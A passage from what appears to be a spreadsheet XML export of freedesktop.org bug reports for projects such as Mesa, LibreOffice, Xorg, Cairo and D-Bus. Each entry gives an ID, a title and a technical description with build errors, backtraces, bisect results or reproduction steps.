zip file with plain text email html email greek letters image (lower upsilon in red)
Problem description: Greek letter Ï… (lower Upsilon) is malformed in plain-text and html emails created by mail-merge
Steps to reproduce:
1. include letter Ï… (lower Upsilon) in a paragraph
2. select to send plain-text or html email
Current behavior: see attached docs
Expected behavior: see attached docs
Operating System: Debian
Version: 4.1.2.3 release</t>
  </si>
  <si>
    <t>WAYLAND-94015</t>
  </si>
  <si>
    <t>Disabling Disable While Typing disables touchpad</t>
  </si>
  <si>
    <t>Disabling Disable While Typing via xinput set-int-prop 11 292 8 0 actually disables the touchpad instead. It behaves as if it is constantly in typing state.
libinput 1.1.6
xf86-input-libinput 0.16.0</t>
  </si>
  <si>
    <t>MESA-51364</t>
  </si>
  <si>
    <t>piglit fs-clip-distance-interpolated regression</t>
  </si>
  <si>
    <t>mesa: 78ac9af58021b7cc649c35fda112f61c98b31766
Run piglit fs-clip-distance-interpolated on softpipe.
$ ./bin/shader_runner tests/spec/glsl-1.30/execution/clipping/fs-clip-distance-interpolated.shader_test -auto
Mesa warning: failed to remap index 173
Probe at (00)
  Expected: 0.000000 1.000000 0.000000 1.000000
  Observed: 0.000000 0.000000 0.000000 0.000000
PIGLIT: {'result': 'fail' }
4625a9b1adf7a30c56e2bbeb41573fbba4465851 is the first bad commit
commit 4625a9b1adf7a30c56e2bbeb41573fbba4465851
Author: Olivier Galibert 
Date:   Tue Jun 19 20:51:19 2012 +0200
    draw: fix flat shading and screen-space linear interpolation in clipper
    This includes:
    - picking up correctly which attributes are flatshaded and which are
      noperspective
    - copying the flatshaded attributes when needed including the
      non-built-in ones
    - correctly interpolating the noperspective attributes in screen-space
      instead than in a 3d-correct fashion.
    Signed-off-by: Olivier Galibert 
    Reviewed-by: Brian Paul 
:040000 040000 090014c9dd5d0b75d2fa87fe248496c142a4095c fb5b3d37d3854ca91661384af17bfebac8859a7f M      src
bisect run success</t>
  </si>
  <si>
    <t>DRI-103705</t>
  </si>
  <si>
    <t>[BAT] igt@gem_workarounds@basic-read - Failed assertion: workaround_fail_count(fd ctx) == 0</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3333/fi-cnl-y/igt@gem_workarounds@basic-read.html
(gem_workarounds:3688) WARNING: 0x094D4	0x00800080	0x00000080	0x00000000	FAIL
(gem_workarounds:3688) CRITICAL: Test assertion failure function check_workarounds file gem_workarounds.c:188:
(gem_workarounds:3688) CRITICAL: Failed assertion: workaround_fail_count(fd ctx) == 0
(gem_workarounds:3688) CRITICAL: error: 1 != 0
Subtest basic-read failed.</t>
  </si>
  <si>
    <t>LIBREOFFICE-41167</t>
  </si>
  <si>
    <t>Impress doesn't manage versioning as Writer does</t>
  </si>
  <si>
    <t>Problem description: 
Impress doesn't set a version number to its documents. 
Steps to reproduce:
1. .... unreproducible because the feature does not even exist
2. ....
3. ....
Current behavior:
No versioning system
Expected behavior:
The same versioning system as Writer</t>
  </si>
  <si>
    <t>laurent.bauvens</t>
  </si>
  <si>
    <t>DRI-83925</t>
  </si>
  <si>
    <t>[byt 3.14] bios trashes ringbuffer</t>
  </si>
  <si>
    <t>System is :
- Kernel 3.14.14
- Mesa 10.1.3
- Intel HD 4400 (Intel NUC DE3815TYKE)
- OS : Tizen Common x86_64
- uname -a : Linux common_box 3.14.14-10.4-common-x86_64-default #1 SMP PREEMPT Fri Aug 29 19:26:37 UTC 2014 x86_64 GNU/Linux
Summary:
 When initializing the DRM hardware manually then creating a GBM buffer on it and then creating an EGL context on the GBM display the i915 driver will hang will the following messages :
 [drm:valleyview_set_repos] GPU freq request from 375 Mhz (201) to 375 Mhz (201)
 [drm:valleyview_set_repos] GPU freq request from 375 Mhz (201) to 375 Mhz (201)
   (repeated many times)
 [drm] stuck on render ring
 [drm] GPU crash dump saved to /sys/class/drm/card0/error
 [drm] GPU hangs can indicate a bug anywhere [...] Please file a _new_ bug report [...]
 (drm:i915_error_work_func] resetting chip
The chip then resets which will freeze the client application for about 6 seconds. The application may work but startup will be slow. This only happens once not depending on any time nor boot sequence.
This typically happens when running Weston with the DRM backend and GL renderer (weston --backend=drm-backend.so). Attached a sample program which mimics Weston startup and always reproduces the crash.
Note : issuing non-EGL commands on the GBM surface such as software Pixman/Cairo will not reproduce the crash.
Steps to reproduce :
 1. Disable any other display system (X.Org Weston...)
 2. Reboot with the following kernel options : drm.debug=0x06 log_buf_len=10M initcall_debug ignore_loglevel debug.
 3. Compile and as root run the sample program.
 4. Run dmesg |grep -i drm and notice the crash.</t>
  </si>
  <si>
    <t>manuel.bachmann</t>
  </si>
  <si>
    <t>CAIRO-16129</t>
  </si>
  <si>
    <t>Don't export private symbols on non-win32 systems</t>
  </si>
  <si>
    <t>Created attachment 16782
cairo-export-symbols.patch
Hi
it would be nice if cairo didn't export private symbols like _cairo_atomic_mutex _cairo_font_face_mutex etc.
Attached patch makes cairo export whatever is in cairo.def (for some reason I don't have that file) on win32 as it was before but uses a symbol export regexp on other systems that makes it export only ^cairo.* symbols.
Please consider applying this for 1.6.
Thanks</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-63639</t>
  </si>
  <si>
    <t>NewProject page doesn't exist</t>
  </si>
  <si>
    <t>The frontpage says:
   See NewProject for how to start a new project.
However the NewProject page doesn't exist.</t>
  </si>
  <si>
    <t>LIBREOFFICE-43923</t>
  </si>
  <si>
    <t>Cyrillic strings in Danish GUI</t>
  </si>
  <si>
    <t>Created attachment 54534
Screendump with Russian text strings
In Spreadsheet select Tools - Solver
Click Options
Select DEPS or SCO.
The settings are in Russian (Cyrillic letters).
In case the strings are not translated to Danish the fall back strings should be English.
In the English GUI the strings are English.</t>
  </si>
  <si>
    <t>TELEPATHY-72003</t>
  </si>
  <si>
    <t>use-conn setting not working correctly</t>
  </si>
  <si>
    <t>Looks like this bug was introduced in telepathy mission-control 5.16.0
Steps to reproduce:
gsettings set im.telepathy.MissionControl.FromEmpathy use-conn false
Current behavior: 
MC_DEBUG=all G_MESSAGES_DEBUG=all /usr/lib/telepathy/mission-control-5 2&gt;&amp;1  | grep use-conn
(process:23529): mcd-DEBUG: mcd_connectivity_monitor_set_use_conn: use-conn GSettings key changed new value = false
(process:23529): mcd-DEBUG: mcd_connectivity_monitor_set_use_conn: use-conn GSettings key changed new value = true
The real value is being overridden by the default value (true) at startup.
If we set the value using gsettings during runtime it works as expected and the connection managers are launched even if there is no network.
Expected behavior:
mission-control should respect the value defined in gsettings at startup.</t>
  </si>
  <si>
    <t>tiago.herrmann</t>
  </si>
  <si>
    <t>MESA-85189</t>
  </si>
  <si>
    <t>llvm/invocation.cpp: In function 'void {anonymous}::optimize(llvm::Module* unsigned int const std::vector&amp;)': llvm/invocation.cpp:324:18: error: expected type-specifier</t>
  </si>
  <si>
    <t>mesa: 15eb4c59f6504473989e6a064fda11d6c009ed8f (master 10.4.0-devel)
$ llvm-config --version
3.4.2
  CXX      llvm/libclllvm_la-invocation.lo
llvm/invocation.cpp: In function 'void {anonymous}::optimize(llvm::Module* unsigned int const std::vector&amp;)':
llvm/invocation.cpp:324:18: error: expected type-specifier
       PM.add(new llvm::DataLayoutPass(mod))
                  ^</t>
  </si>
  <si>
    <t>MESA-102530</t>
  </si>
  <si>
    <t>[bisected] Kodi crashes when launching a stream - commit bd2662bf</t>
  </si>
  <si>
    <t>I get a segfault when launching a stream (from Covenant) on Kodi. Bisecting ended up with the following culprit:
commit bd2662bfa1c8746dc29a7bad32a1647379f78532
Author: Timothy Arceri 
Date:   Thu Mar 30 23:22:46 2017 +1100
    mesa: add KHR_no_error support to glUniform*() functions
    V2: restore lost comment add static to validate_uniform()
        simplify array offset logic.
    Reviewed-by: Nicolai HÃ¤hnle 
:040000 040000 4a82c824807bda025e4069be599697f2a6ccc817 0f3fc38d84e905f95f34d3b63c32d06b897ef551 M	src
This is when KHR_no_error is enabled.
Whether MESA_NO_ERROR is set or not (KHR_no_error disabled) kodi exits with a segfault.</t>
  </si>
  <si>
    <t>PIGLIT-101641</t>
  </si>
  <si>
    <t>sw_sync.c:35:29: fatal error: linux/sync_file.h: No such file or directory</t>
  </si>
  <si>
    <t xml:space="preserve">piglit: 3b9e5ba14b930fe61761d5ddbd736593ef000228 (master)
tests/egl/spec/egl_khr_fence_sync/sw_sync.c:35:29: fatal error: linux/sync_file.h: No such file or directory
 #include 
                             ^
Build error introduced with this commit.
commit 2e423dd3f4ca3820fbbc956f3b77ed3d7587dd87
Author: Rafael Antognolli 
Date:   Mon Nov 7 15:05:04 2016 -0800
    egl_khr_fence_sync: Add sw_sync lib.
    Add a small library that helps manipulating software fences. They are
    useful for testing EGL Android fences since the latter can be created
    out of them.
    Signed-off-by: Rafael Antognolli 
    Reviewed-by: Eric Anholt </t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-2693</t>
  </si>
  <si>
    <t>African keyboard layouts</t>
  </si>
  <si>
    <t>There is currently no generic African Keyboard Layout.
Unicode supports most of the needed charactes.
The data available at http://www.bisharat.net/A12N/ can tell you what the
requirements are.</t>
  </si>
  <si>
    <t>MESA-1858</t>
  </si>
  <si>
    <t>Drivers/DRI/Gamma</t>
  </si>
  <si>
    <t>Hello there
I just tried to compile X11R6.8.1 with the most excellent Intel C
8.1 compiler on a Linux Fedora Core 3 box. The compiler said
gamma_state.c(1593): warning #175: subscript out of range
The source code is in file
./extras/Mesa/src/mesa/drivers/dri/gamma/gamma_state.c
The source code is
    WRITE(gmesa-&gt;buf TxBaseAddr12 curTex-&gt;TextureBaseAddr[12])
but
[dcb@localhost xc]$ find . -name \*.h -print | xargs grep TextureBaseAddr
./extras/Mesa/src/mesa/drivers/dri/gamma/gamma_context.h:   uint32_t
TextureBaseAddr[GAMMA_TEX_MAXLEVELS]
and
[dcb@localhost xc]$ find . -name \*.h -print | xargs grep GAMMA_TEX_MAXLEVELS
./extras/Mesa/src/mesa/drivers/dri/gamma/gamma_context.h:#define
GAMMA_TEX_MAXLEVELS 12
so curTex-&gt;TextureBaseAddr[12] doesn't exist. Suggest code re-work.</t>
  </si>
  <si>
    <t>MESA-7444</t>
  </si>
  <si>
    <t>glDrawPixels doesn't display grey-images (GL_LUMINANCE) properly</t>
  </si>
  <si>
    <t>While displaying images with GL_RGBA still works properly GL_LUMINANCE does not:
glDrawPixels( get_width() get_height()
              GL_LUMINANCE GL_UNSIGNED_BYTE img.rawData().data() )
The image appears to be skewed in x-direction as if the pixel-size is not
interpreted properly. The problem persists in 16- as well as 24-bit displays. We
only observed this effect in Xorg 6.9.0 (in Xorg 6.8.2 it still was ok).
In our library one can observe the effect in the example-program
'mimas/examples/blob/blob'.
Here's an extract from
'http://vision.eng.shu.ac.uk/jan/mimas/mimas-2.0/lib/image_mesaoutput.cc':
    glDisable(GL_DITHER)
    glPixelStorei( GL_UNPACK_ALIGNMENT 1 )
    glRasterPos2i( 0 0 )
    glPixelZoom( 1 -1 )
    unsigned int retraceCount
    // Wait for vertical retrace
    // http://www.inb.uni-luebeck.de/~boehme/xvideo_sync.html
    glXGetVideoSyncSGI( 
    glXWaitVideoSyncSGI( 2 ( retraceCount + 1 ) % 2 
    // Direct access to image-memory!
    glDrawPixels( get_width() get_height()
                  GL_LUMINANCE GL_UNSIGNED_BYTE img.rawData().data() )
    glEnable(GL_DITHER)</t>
  </si>
  <si>
    <t>TELEPATHY-33857</t>
  </si>
  <si>
    <t xml:space="preserve">Gabble disconnects on: Error receiving stanza: Namespace prefix xmlns on server is not defined </t>
  </si>
  <si>
    <t>* iq xmlns='jabber:client' type='get' to='sam.badger@badger.com' id='134813220909'
    * pubsub xmlns='http://jabber.org/protocol/pubsub'
        * items node='http://jabber.org/protocol/geoloc'
wocky-DEBUG: 03/02/11 15:10:34.225430: _error: wocky-xmpp-reader.c:602: Parsing failed Namespace prefix xmlns on server is not defined
wocky-DEBUG: 03/02/11 15:10:34.225467: _end_element_ns: Received stanza
* presence xmlns='jabber:client' from='nick.badger@badger.com/iTeleport Connect.MAC.7EA2DE9A' to='tom.badger@badger.com/6e399af8'
    * nick xmlns='http://jabber.org/protocol/nick'
        compy
    * type
        MAC
    * id
        vnc
    * server
    * show
        away
    * invisible value='true'
    * priority
        -127
    * name
        iTeleport Connect
    * version
        5.0.6
    * ssh-enabled
        false
    * automanage-vnc
        false
    * encryption-enabled
        true
    * x xmlns='vcard-temp:x:update'
        * photo
            5b553999f89e72537aa147f525596ca32ac14ab8
wocky-DEBUG: 03/02/11 15:10:34.225476: stanza_received_cb: wocky-porter.c:1202: Error receiving stanza: Namespace prefix xmlns on server is not defined
gabble/connection-DEBUG: 03/02/11 15:10:34.225533: remote_error_cb: Force closing of the connection 0x12780d0
wocky-DEBUG: 03/02/11 15:10:34.225632: wocky_porter_force_close_async: wocky-porter.c:1849: remote is already closed close the XMPP connection</t>
  </si>
  <si>
    <t>XORG-16204</t>
  </si>
  <si>
    <t>Build fails with '--disable-xinerama'</t>
  </si>
  <si>
    <t>Configuring with the following causes the xserver build to fail.  Removing '--disable-xinerama' causes it to work again.  I discovered this while trying to validate whether or not bugzilla #6009 still exists.
PKG_CONFIG_PATH=/opt/xorg-master-x86_64/lib64/pkgconfig ACLOCAL='aclocal -I /opt/xorg-master-x86_64/share/aclocal/' ./autogen.sh --prefix=/opt/xorg-master-x86_64 --libdir=/opt/xorg-master-x86_64/lib64 --with-mesa-source=/home/idr/devel/graphics/Mesa --disable-xinerama --disable-dmx --disable-xvfb --disable-xnest --disable-xwin --disable-xgl --disable-xglx --disable-xegl --disable-kdrive --disable-xprint --enable-glx --enable-glx-tls --enable-dri</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-99537</t>
  </si>
  <si>
    <t>Deleting attachment from bugs.freedesktop.org?</t>
  </si>
  <si>
    <t>Hi
I'd like to delete an attachment from bugs.freedesktop.org. It can be set to obsolete which makes it disappear from the attachments list. But it apparently can not be fully deleted. It's still there after setting it to obsolete.
Could someone please help? How can I have it deleted?
Regards</t>
  </si>
  <si>
    <t>nw9165-3201</t>
  </si>
  <si>
    <t>DBUS-29666</t>
  </si>
  <si>
    <t>dbus_bus_get documentation doesn't describe return value on error</t>
  </si>
  <si>
    <t>The documentation for dbus_bus_get states it returns a DBusConnection pointer.
On error it returns NULL. The documentation should reflect this.
It can be as simple as changing HEAD dbus/dbus-bus.c:561 from:
* @returns a #DBusConnection with new ref
to
* @returns a #DBusConnection with new ref or #NULL on error</t>
  </si>
  <si>
    <t>MESA-102897</t>
  </si>
  <si>
    <t>Separate bind points are not implemented correctly</t>
  </si>
  <si>
    <t>Binding descriptors sets for the compute pipeline should not disturb bindings for the graphics pipeline and vice versa. The Vulkan spec states:
pipelineBindPoint is a VkPipelineBindPoint indicating whether the descriptors will be used by graphics pipelines or compute pipelines. There is a separate set of bind points for each of graphics and compute so binding one does not disturb the other.
Crucible: https://lists.freedesktop.org/archives/piglit/2017-September/022949.html</t>
  </si>
  <si>
    <t>XORG-24589</t>
  </si>
  <si>
    <t>xdm-1.1.9: core dump in SessionExit -&gt; PAM -&gt; strlen()</t>
  </si>
  <si>
    <t>There is a bugreport in Gentoo linux where several observed xdm crash when window manager is quit. Personally I use fvwm2 on linux-2.6.30.9 and glibc-2.10.1. I am not sure this is a xdm issue or PAM or glibc issue but was asked to report upstream. Please follow http://bugs.gentoo.org/show_bug.cgi?id=286923 and look for the attachments with fvwm2 in its name. In brief:
(gdb) where
#0  strlen () at ../sysdeps/i386/i486/strlen.S:40
#1  0xb7cb6c98 in fputs_unlocked (str=0xb8003d55  fp=0x8076eb8) at iofputs_u.c:37
#2  0xb7d1993a in __vsyslog_chk (pri=86 flag=1 fmt=0xb7db2a6a %s %s ap=0xbfa0bb8c ï¿½006\b \221\006\b\031\034Û·ï¿½ï¿½ï¿½ï¿½) at ../misc/syslog.c:207
#3  0xb7d19db6 in __syslog_chk (pri=86 flag=1 fmt=0xb7db2a6a %s %s) at ../misc/syslog.c:131
#4  0xb7db0226 in pam_vsyslog (pamh=0x80bb210 priority=86 fmt=0xb797a69e session closed for user %s args=0xbfa0bbfc ï¿½D\f\b) at /usr/include/bits/syslog.h:32
#5  0xb7db02fb in pam_syslog (pamh=0x80bb210 priority=6 fmt=0xb797a69e session closed for user %s) at pam_syslog.c:113
#6  0xb7974bdb in pam_sm_close_session (pamh=0x80bb210 flags=0 argc=0 argv=0x80c0558) at pam_unix_sess.c:125
#7  0xb7dab4b5 in _pam_dispatch (pamh=0x80bb210 flags=0 choice=5) at pam_dispatch.c:110
#8  0xb7daf4c3 in pam_close_session (pamh=0x0 flags=0) at pam_session.c:44
#9  0x0805340d in SessionExit (d=0x8068298 status=0 removeAuth=1) at session.c:480
#10 0x08053be9 in ManageSession (d=0x8068298) at session.c:375
#11 0x080506b0 in StartDisplay (d=0x8068298) at dm.c:762
#12 0x0804fbdc in ForEachDisplay (f=0x805079e ) at dpylist.c:54
#13 0x08051267 in main (argc=1 argv=0xbfa0c304) at dm.c:630
Current language:  auto currently asm
(gdb) bt full
#0  strlen () at ../sysdeps/i386/i486/strlen.S:40
No locals.
#1  0xb7cb6c98 in fputs_unlocked (str=0xb8003d55  fp=0x8076eb8) at iofputs_u.c:37
        result = 
[cut]</t>
  </si>
  <si>
    <t>CAIRO-4182</t>
  </si>
  <si>
    <t>Add a clamp extend mode.</t>
  </si>
  <si>
    <t>typedef enum _cairo_extend {
    CAIRO_EXTEND_NONE
    CAIRO_EXTEND_REPEAT
    CAIRO_EXTEND_REFLECT
} cairo_extend_t
Is missing one of the most commonly needed extend modes - using the
nearest pixel within the image. A common usage of this is when you
want to scale an image with a hard edge but with filtering of its
contents. EXTEND_NONE fuzzes out the edges.
See: 
http://lists.freedesktop.org/archives/cairo/2005-July/004487.html
and followups for one example of this problem. (Message unfortunately
munged out of recognition by pipermail but I'll leave the link in
hopes that will be fixed at some point without renumbering the 
archives.)</t>
  </si>
  <si>
    <t>PULSEAUDIO-107070</t>
  </si>
  <si>
    <t>Problem with permissions of pipe created by module-pipe-sink</t>
  </si>
  <si>
    <t>I'm on archlinux.  When upgrading to pulseaudio 12 my setup with pulse running as system daemon and outputting to a fifo pipe stopped working.
The setup is:
mpd -&gt; pulseaudio (system) -&gt; fifo -&gt; snapserver (part of snapcast)
Pulseaudio is running in system mode because it's a headless server broadcasting the audio over the network through snapcast.
I traced the problem back to the change in umask setting in pulseaudio 12.
This causes the pipe to be created by pulseaudio with only read and write permissions for the pulse user where before it was also allowing read permissions for the pulse group.
Creating the sink pipe with only permissions for the pulse user is completely useless since any program that's reading the pipe will very likely be running under a different user.
This basically renders the sink pipe useless in system mode and will probably also have consequences or side-effects in user mode.
This is my very first ticket here so please let me know if additional information is needed.</t>
  </si>
  <si>
    <t>devriesb</t>
  </si>
  <si>
    <t>CAIRO-39970</t>
  </si>
  <si>
    <t>Incorrect result of cairo_fill_extents</t>
  </si>
  <si>
    <t xml:space="preserve">In the following code snippet cairo_fill_extents incorrectly returns zero (empty) rectangle.
This affects version 1.10.2 (in 1.8.10 the result is correct for this specific case).
cairo_new_path( 
cairo_move_to( 
cairo_line_to( 
cairo_line_to( 
cairo_fill_extents( </t>
  </si>
  <si>
    <t>DBUS-8197</t>
  </si>
  <si>
    <t>DBus service start reply constants incorrectly defined in dbus.dbus_bindings</t>
  </si>
  <si>
    <t>The dbus.dbus_bindings module incorrectly defines the value of the service start
reply constants. DBUS_START_REPLY_SUCCESS should be 1 (not 0) and
DBUS_START_REPLY_ALREADY_RUNNING should be 2 (not 1).
dbus/dbus_bindings.pyx:
1719 # these are defines not enums so they aren't auto generated
1720 DBUS_START_REPLY_SUCCESS = 0
1721 DBUS_START_REPLY_ALREADY_RUNNING = 1
/usr/include/dbus-1.0/dbus/dbus-shared.h:
86 /* Replies to service starts */
87 #define DBUS_START_REPLY_SUCCESS         1
88 #define DBUS_START_REPLY_ALREADY_RUNNING 2</t>
  </si>
  <si>
    <t>rrdharan</t>
  </si>
  <si>
    <t>LIBOIL-6076</t>
  </si>
  <si>
    <t>typo in function name [ARM]</t>
  </si>
  <si>
    <t>Should be oil_profile_stamp_xscale255 instead of oil_profile_stamp_xcale255
http://webcvs.freedesktop.org/liboil/liboil/liboil/liboilprofile.c?rev=1.7&amp;view=markup
#if defined(__arm__)
/* untested */
static unsigned long
oil_profile_stamp_xcale255(void)
{
  unsigned int ts
  /* this only works for XScale 255 */
  __asm__ __volatile__ (
        mrc p14 0 %0 c0 c0 0 \n
      : =r (ts))
  return ts
}
#endif</t>
  </si>
  <si>
    <t>LIBREOFFICE-72420</t>
  </si>
  <si>
    <t>Help button in new start center links to LO website instead of help</t>
  </si>
  <si>
    <t>This means either:
- the button should be renamed to Website
or
- the button should link to installed/wiki help.</t>
  </si>
  <si>
    <t>XORG-100285</t>
  </si>
  <si>
    <t>build failure : â€˜struct _GCâ€™ has no member named â€˜pRotatedPixmapâ€™</t>
  </si>
  <si>
    <t>The driver xf86-video-driver can't be build anymore since the commit 	0803918e64262482035f042e5e1f2a571d3dea1b from xorg/xserver.
https://cgit.freedesktop.org/xorg/xserver/diff/include/gcstruct.h?id=0803918e64262482035f042e5e1f2a571d3dea1b
Output:
-------
sna_accel.c: In function â€˜sna_create_gcâ€™:
sna_accel.c:16965:4: error: â€˜struct _GCâ€™ has no member named â€˜pRotatedPixmapâ€™
  gc-&gt;pRotatedPixmap = 0</t>
  </si>
  <si>
    <t>MESA-105994</t>
  </si>
  <si>
    <t>surface state leak when creating and destroying image views with aspectMask depth and stencil</t>
  </si>
  <si>
    <t>--------------------------------------------
On mesa 17.3 function anv_CreateImageView:
iview-&gt;n_planes = anv_image_aspect_get_planes(iview-&gt;aspect_mask)
    iview-&gt;aspect_mask is 0x6 n_planes is 1
anv_foreach_image_aspect_bit(iaspect_bit image expanded_aspects) {
    expanded_aspects is 0x6 the loop runs *twice*
iview-&gt;planes[vplane].optimal_sampler_surface_state.state = alloc_surface_state(device)
         iview-&gt;planes[vplane].general_sampler_surface_state.state = alloc_surface_state(device)
    Allocated surface state for vplane 0 and 1
----------------------------------
In function anv_DestroyImageView:
for (uint32_t plane = 0 plane n_planes plane++) {
Loop runs only once.</t>
  </si>
  <si>
    <t>XORG-93539</t>
  </si>
  <si>
    <t>XInput 2 NotifyPointer events are not sent to the pointer window</t>
  </si>
  <si>
    <t>In the XInput 2 event dispatching code we propagate focus out events starting from the child's parent up to (but excluding) the ancestor window (see DeviceFocusOutEvents). However NotifyPointer focus out events should also be sent to the window containing the pointer (the child itself) as performed by the core input event system.
This surfaced as a bug in Firefox/GTK3 that caused focus handing to fail due to a missing FocusOut (detail=NotifyPointer) event when focus was moved from PointerRoot to another toplevel after a window's destruction. As a GTK window's focus is changed when a NotifyPointer event occurs on a window this was causing the window to permanently retain focus (according to GTK at least). This does not occur on the core/non-xi2 backend which does send NotifyPointer focus out events to the pointer window.
The events that should occur when moving from PointerRoot to another window are detailed quite well here
https://tronche.com/gui/x/xlib/events/input-focus/normal-and-grabbed.html</t>
  </si>
  <si>
    <t>LIBREOFFICE-59393</t>
  </si>
  <si>
    <t>REGRESSION: when FILEOPEN particular .RTF column width in tables is taken from the next column</t>
  </si>
  <si>
    <t>Created attachment 73047
Example file with wrong column width in LibO 4 and screenshots from different office suites
LibO Version 4.0.0.1 (Build ID: 527dba6f6e0cfbbc71bd6e7b88a52699bb48799) on Windows XP SP3 Russian
After I entered sizes of columns from all Office suites (MSO 2003 SP3 MSO 2007 SP3 LibO 3.6.4.3 and LibO 4.0.0.1) in a single table it is clearly seen that in LibO 4.0 width for the first column is taken from the second then for the second - from the third and only then for the third column from the first!
Summary table with column size compare.ods include name of a document page number of the document and the table number in the order of the document.
Because of this problem a large number of documents has become unsuitable even for viewing.</t>
  </si>
  <si>
    <t>kaktebyavirubit</t>
  </si>
  <si>
    <t>LIBREOFFICE-55022</t>
  </si>
  <si>
    <t>FILEOPEN: CRASH during Adapt row height when opening particular .ods</t>
  </si>
  <si>
    <t>Created attachment 67285
spreadsheet crashing during FILEOPEN adapt row height
Problem description: 
A particular .ods spreadsheet file causes LibO 3.6.1.2 to crash midway through FILEOPEN Adapt how height phase. Local installations and portable versions of 3.6.1.2 exhibit the same behaviour. However the file opens normally in 3.5.5.3 and 3.5.6.2.
See also this thread http://en.libreofficeforum.org/node/4326
Steps to reproduce:
1. Open new LibO 3.6.1.2 spreadsheet document
2. File &gt; Open &gt; select attached sample file &gt; double click
Current behavior:
LibO crashes partway through the Adapt row height phase of loading the file with the message LibreOffice 3.6 has stopped working. Memory usage is not excessive so this bug is distinct from #44420.
Expected behavior:
Normal loading of the file as occurs in LibO 3.5.5.3 (Windows portable) and 3.5.6.2 (Linux).
Platform (if different from the browser): 
Windows 7 x64
Browser: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML like Gecko) Chrome/21.0.1180.89 Safari/537.1</t>
  </si>
  <si>
    <t>iainbutler</t>
  </si>
  <si>
    <t>DRI-94576</t>
  </si>
  <si>
    <t>[BDW] gem_sync / basic-all fails</t>
  </si>
  <si>
    <t>Created attachment 122352
Dmesg log
Configuration:
--- Software information ---
 ++ Kernel version                      : 4.4.4-040404-generic
 ++ Linux distribution                  : Ubuntu 15.10
 ++ Architecture                        : 64-bit
 ++ xf86-video-intel version            : 2.99.917
 ++ Xorg-Xserver version                : 1.17.2
 ++ DRM version                         : 2.4.64
 ++ VAAPI version                       : Intel i965 driver for Intel(R) Broadwell - 1.6.0
 ++ Cairo version                       : 1.14.2
 ++ Intel GPU Tools version             : Tag [intel-gpu-tools-1.14-74-g431f6c4] / Commit [431f6c4]
 ++ Kernel driver in use                : i915
 ++ Bios revision                       : 5.6
 --- Hardware information ---
 ++ Platform                            :
 ++ Motherboard model                   :
 ++ Motherboard type                    : NUC5i7RYB Desktop
 ++ Motherboard manufacturer            :
 ++ CPU family                          : Core i7
 ++ CPU information                     : Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz
 ++ GPU Card                            : Intel Corporation Broadwell-U Integrated Graphics (rev 09) (prog-if 00 [VGA controller])
 ++ Memory ram                          : 8 GB
 ++ Maximum memory ram allowed          : 16 GB
 ++ Display resolution                  :
 ++ CPU's number                        : 4
 ++ Hard drive capacity                 : 120 GB
Output:
 ./gem_sync --run-subtest basic-all
IGT-Version: 1.14-g431f6c4 (x86_64) (Linux: 4.4.4-040404-generic x86_64)
bsd2 completed 443392 cycles: 22.569 us
vebox completed 458752 cycles: 21.820 us
blt completed 342016 cycles: 29.271 us
bsd1 completed 470016 cycles: 21.302 us
render completed 123904 cycles: 80.863 us
(gem_sync:1261) CRITICAL: Test assertion failure function sync_ring file gem_sync.c:159:
(gem_sync:1261) CRITICAL: Failed assertion: intel_detect_and_clear_missed_interrupts(fd) == 0
(gem_sync:1261) CRITICAL: error: 31 != 0
Stack trace:
  #0 [__igt_fail_assert+0x101]
  #1 [sync_ring+0x398]
  #2 [__real_main162+0xff]
  #3 [main+0x23]
  #4 [__libc_start_main+0xf0]
  #5 [_start+0x29]
  #6 [+0x29]
Subtest basic-all failed.
**** DEBUG ****
(gem_sync:1261) CRITICAL: Test assertion failure function sync_ring file gem_sync.c:159:
(gem_sync:1261) CRITICAL: Failed assertion: intel_detect_and_clear_missed_interrupts(fd) == 0
(gem_sync:1261) CRITICAL: error: 31 != 0
****  END  ****
Subtest basic-all: FAIL (10.216s)</t>
  </si>
  <si>
    <t>LIBREOFFICE-88326</t>
  </si>
  <si>
    <t>headless --convert-to should not fail silently if invalid filtername</t>
  </si>
  <si>
    <t>converting a sourcefile unsing convert-to in headless mode
if command fails (due to invalid filtername)
- the return code is still 0 
- the message converting sourcefile --&gt; sourcefile. using 
- a copy of source file renamed to sourcefile.
working eg.
$soffice --headless --convert-to pdf ./myFile.txt
convert /path/to/file/myFile.txt -&gt; /path/to/file/myFile.pdf using writer_pdf_Export
$echo $?
0
NON working eg.
$soffice --headless --convert-to aDummyFilterName ./myFile.txt
convert /path/to/file/myFile.txt -&gt; /path/to/file/myFile.aDummyFilterName using 
$echo $?
0
==&gt; the return of the non working example should not be 0
==&gt; any code pointer welcomed</t>
  </si>
  <si>
    <t>CAIRO-33081</t>
  </si>
  <si>
    <t>Bad Win32 Backend Performance After Fallback Change</t>
  </si>
  <si>
    <t>It turns out that the Mozilla project has been unable to use Cairo since the early part of 2010 due to a change cairo-surface-fallback.c.
(see http://cgit.freedesktop.org/cairo/commit/?id=3b1c0a4bd66660780095e6016e3db451f34503a3)
While the commit message indicates that this would only impact the GL backend it turns out that the win32 backend is heavily impacted by this change.
Ultimately the correct resolution is to fix the win32 backend so that it does not need to use fallbacks.</t>
  </si>
  <si>
    <t>XORG-12759</t>
  </si>
  <si>
    <t>Thai XIM fails to retrieve multi-byte surrounding text on UTF-8 locale</t>
  </si>
  <si>
    <t>On th_TH.UTF-8 locale Thai XIM rejects all combining characters for GTK+ apps that use X Input Method.
This is because GTK+ imxim immodule passes surrounding text in locale encoding which is UTF-8 for UTF-8 locales. But current Thai XIM in Xlib assumes the multi-byte StringConversionText response for the StringConversionCallback to always be TIS-620 by retrieving a single byte and using it as-is.
If the Thai XIM tries to convert the multi-byte text based on locale codeset before using it it will work again.</t>
  </si>
  <si>
    <t>DRI-94079</t>
  </si>
  <si>
    <t>[BAT regression] snd-hda blows up in module reload since CI build 1040</t>
  </si>
  <si>
    <t>Looking at the testcase history /archive/results/CI_IGT_test/igt@drv_module_reload_basic.html most machine seem affected but some only sporadically.
[  398.616887] general protection fault: 0000 [#1] PREEMPT SMP
